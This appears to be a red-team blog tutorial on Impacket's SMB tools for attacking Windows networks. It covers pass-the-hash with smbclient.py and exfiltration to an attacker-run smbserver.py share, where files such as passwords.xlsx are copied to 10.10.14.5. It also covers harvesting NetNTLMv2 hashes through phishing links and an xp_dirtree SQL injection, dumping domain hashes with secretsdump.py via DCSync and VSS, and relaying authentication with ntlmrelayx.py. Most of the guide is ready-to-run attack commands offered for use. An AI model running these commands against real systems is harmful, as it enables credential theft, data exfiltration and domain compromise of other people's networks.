For a red teamer, SMB (Server Message Block) is the lifeblood of the Windows network. It is the circulatory system of the enterprise: it’s how we move laterally, how we exfiltrate data, how we host our own payloads, and often, how we escalate privileges.

While the standard Samba smbclient (which we covered in our previous article) is a robust “Swiss Army Knife,” Impacket is the heavy artillery.

Impacket is a collection of Python classes that provides low-level programmatic access to network protocols. Created by SecureAuth (and now maintained by Fortra), it allows you to craft packets, manipulate flags, and interact with Windows services in ways that standard tools simply cannot.

In this deep dive, we will explore the “Holy Trinity” of Impacket’s SMB tools: smbclient.py, smbserver.py, and the legendary secretsdump.py. We will also touch on the dark art of NTLM Relaying with ntlmrelayx.py.

[!NOTE] This guide assumes you have Impacket installed. If not, I highly recommend using pipx to keep your environment clean: pipx install git+https://github.com/fortra/impacket.git

Part 1: The Power of smbclient.py

Native smbclient is great for file transfers, but it struggles with one key red team requirement: Pass-the-Hash (PtH).

Pass-the-Hash Support

If you have compromised a machine and dumped the SAM database or LSASS process, you rarely have the cracked plaintext password. You have the NTLM hash. Impacket was built for this.

1
2
3
4
5

# Syntax: -hashes LM:NT
# The LM part is almost always empty (or 32 zeros) in modern Windows.

# Format: user@target -hashes :NThash
smbclient.py -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@10.10.10.5

This functionality alone makes smbclient.py indispensable. You can navigate the filesystem, download files, and upload payloads using nothing but the hash.

Scripted Interaction

Unlike the native tool, smbclient.py behaves slightly differently. It offers a semi-interactive shell.

  • use <share>: Connect to a specific share.
  • shares: List available shares (requires permissions).
  • ls: List files.
  • get <remote> <local>: Download.
  • put <local> <remote>: Upload.
  • recurse TRUE: Toggle recursion for mget.

Why use smbclient.py over smbclient?

  1. Native PtH: No need for workarounds.
  2. Library Access: You can import impacket.smbconnection in your own Python scripts to build custom automated attack tools.
  3. Consistency: It behaves consistently across Linux, macOS, and Windows (via Python).

Part 2: Weaponizing smbserver.py

While smbclient.py allows you to consume shares, smbserver.py allows you to create them. This pseudo-SMB server is one of the most versatile tools in a Red Teamer’s kit.

Scenario 1: The “Easy Button” for Exfiltration

You are on a compromised Windows host via a reverse shell. You found passwords.xlsx but RDP copy-paste is disabled, and you can’t install tools on the victim.

  1. On Kali (Attacker):

    1
2
3

    # Syntax: smbserver.py <ShareName> <Path>
# -smb2support is critical for modern Windows (10/11/Server 2016+)
sudo smbserver.py LOOT . -smb2support

  2. On Windows (Victim):

    1

    copy C:\Users\CEO\Desktop\passwords.xlsx \\10.10.14.5\LOOT\

No firewall changes (usually outbound SMB to local subnet is allowed), no valid credentials needed on the Windows side (default is anonymous read/write).

Scenario 2: UNC Path Injection & Credential Harvesting

This is where smbserver.py becomes a weapon. If you can force a Windows machine (or user) to access a file path you control, Windows will automatically attempt to authenticate to you using the current user’s NetNTLMv2 hash.

  1. Start the Server:

    1

    sudo smbserver.py AUTH . -smb2support

  2. Trigger the Connection:

    • Phishing: Send an email with a link to file://10.10.14.5/AUTH/bonus.docx.
    • Unquoted Service Path: If a service tries to run C:\Program Files\App.exe, you might intercept it.
    • SQL Injection: xp_dirtree '\\10.10.14.5\AUTH' on a database server.
    • Web Vulnerabilities: File inclusion or SSRF pointing to your IP.

  3. The Result: Impacket will capture the NetNTLMv2 hash of the connecting user. You can then crack this hash with Hashcat (-m 5600).

Scenario 3: EDR Evasion with Authenticated Shares

EDRs (Endpoint Detection & Response) often flag anonymous SMB connections to unknown IPs. You can harden your smbserver to look legitimate.

1
2

# Create a user/pass required to access the share
sudo smbserver.py -username backup -password 'S3cure!' BACKUP . -smb2support

Now, on the victim machine, you map the drive formally:

1
2

net use Z: \\10.10.14.5\BACKUP /user:backup S3cure!
copy sensitive.dat Z:\

Part 3: The Crown Jewel - secretsdump.py

If smbclient.py is the hand, secretsdump.py is the fist. This tool automates the retrieval of secrets from a Windows machine using three primary techniques.

Technique 1: SAM and LSA Dump (Local Admin)

If you have Local Administrator credentials (plaintext or hash), secretsdump will:

  1. Connect to the ADMIN$ share.
  2. Upload a dummy service/binary.
  3. Execute it to dump the SAM (Security Account Manager) and SYSTEM registry hives.
  4. Parse them to give you local NTLM hashes.
  5. Clean up after itself.
1
2

# Dump local SAM hashes
secretsdump.py administrator@10.10.10.5 -hashes :NTHASH

Technique 2: DCSync (Domain Admin)

If you compromise a Domain Admin or a user with “Replicating Directory Changes” privileges, secretsdump performs a DCSync attack. It speaks MS-DRSR (Directory Replication Service Remote Protocol) to the Domain Controller and asks it to replicate user hashes.

Why this is dangerous: It generates no logon events on the endpoint targets. It looks like normal DC-to-DC replication traffic (mostly).

1
2

# Dump the ENTIRE Domain Database (NTDS.dit) remotely
secretsdump.py 'DOMAIN/Administrator:Password123@dc01.corp.local'

This will output:

  • NTLM hashes for every user in the domain.
  • Kerberos keys (AES128/256) for Golden Ticket creation.
  • Cleartext passwords (if reversible encryption is enabled).

Technique 3: NTDS.dit via VSS

If you cannot DCSync but have admin access to a DC, secretsdump can use Volume Shadow Copies (VSS) to copy the locked NTDS.dit database file and parse it offline.

1

secretsdump.py -use-vss Administrator@dc01.corp.local

Part 4: The Weapon of Mass Destruction - ntlmrelayx.py

Relaying is conceptually simple: User A tries to authenticate to you. You forward that authentication to Server B. Server B thinks you are User A and lets you in.

The Constraint: SMB Signing

You cannot relay SMB authentication to another SMB server if SMB Signing is enabled (and it is enforced on Domain Controllers).

The Bypass: Cross-Protocol Relaying

The magic of ntlmrelayx.py is that you catch an SMB authentication (e.g., from Responder or smbserver) and relay it to Non-SMB protocols that often don’t enforce signing, like LDAP, IMAP, or HTTP (AD CS).

1
2
3

# SOCKS Proxy Mode (-socks)
# This creates a SOCKS proxy for every successful relayed session.
ntlmrelayx.py -tf targets.txt -smb2support -socks
  1. Victim connects to you.
  2. ntlmrelayx relays to targets.txt.
  3. If successful, it opens a SOCKS connection on port 1080.
  4. You leverage it with proxychains:
    1

    proxychains smbclient //10.10.10.50/C$ -U Admin

Part 5: Comparing Architectures

Featuresmbclient (Native)smbclient.py (Impacket)
LanguageC (Samba)Python
Pass-the-HashNo (Requires workaround)Yes (Native)
KerberosYes (via -k)Yes (via -k and -target)
SpeedFastSlower (Python overhead)
ScriptingBash/ExpectImportable Python Module
ForensicsLooks like “Samba”User-Agent defaults to Python/Impacket string (changeable in code)

Part 6: Troubleshooting Impacket

  1. Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

    • Cause: Your attacker machine time is out of sync with the Domain Controller. Kerberos requires sync within 5 minutes.
    • Fix: sudo ntpdate dc01.corp.local or rdate -n <IP>.

  2. STATUS_SHARING_VIOLATION

    • Cause: You are trying to download a file that is currently locked/open by a user (e.g., a loaded NTUSER.DAT).
    • Fix: Use secretsdump.py with -use-vss to create a shadow copy snapshot, bypassing the file lock.

  3. STATUS_MORE_PROCESSING_REQUIRED

    • Cause: Often seen during NTLM negotiation. If it hangs, it might be a mechanism like “Extended Protection for Authentication” (EPA) blocking the relay, or simply protocol negotiation mismatch.

Conclusion

Impacket is not just a tool; it is a framework that fundamentally changed how we attack Windows networks. While smbclient.py gives you access, tools like secretsdump.py and ntlmrelayx.py give you dominion.

Understand the underlying protocols. Don’t just run the script; know why secretsdump works (DRSUAPI vs SCM capabilities). Know why relaying fails (Signing). That knowledge separates the script kiddie from the professional operator.

Harden your ops, check your logs, and as always:

Happy Hacking.

References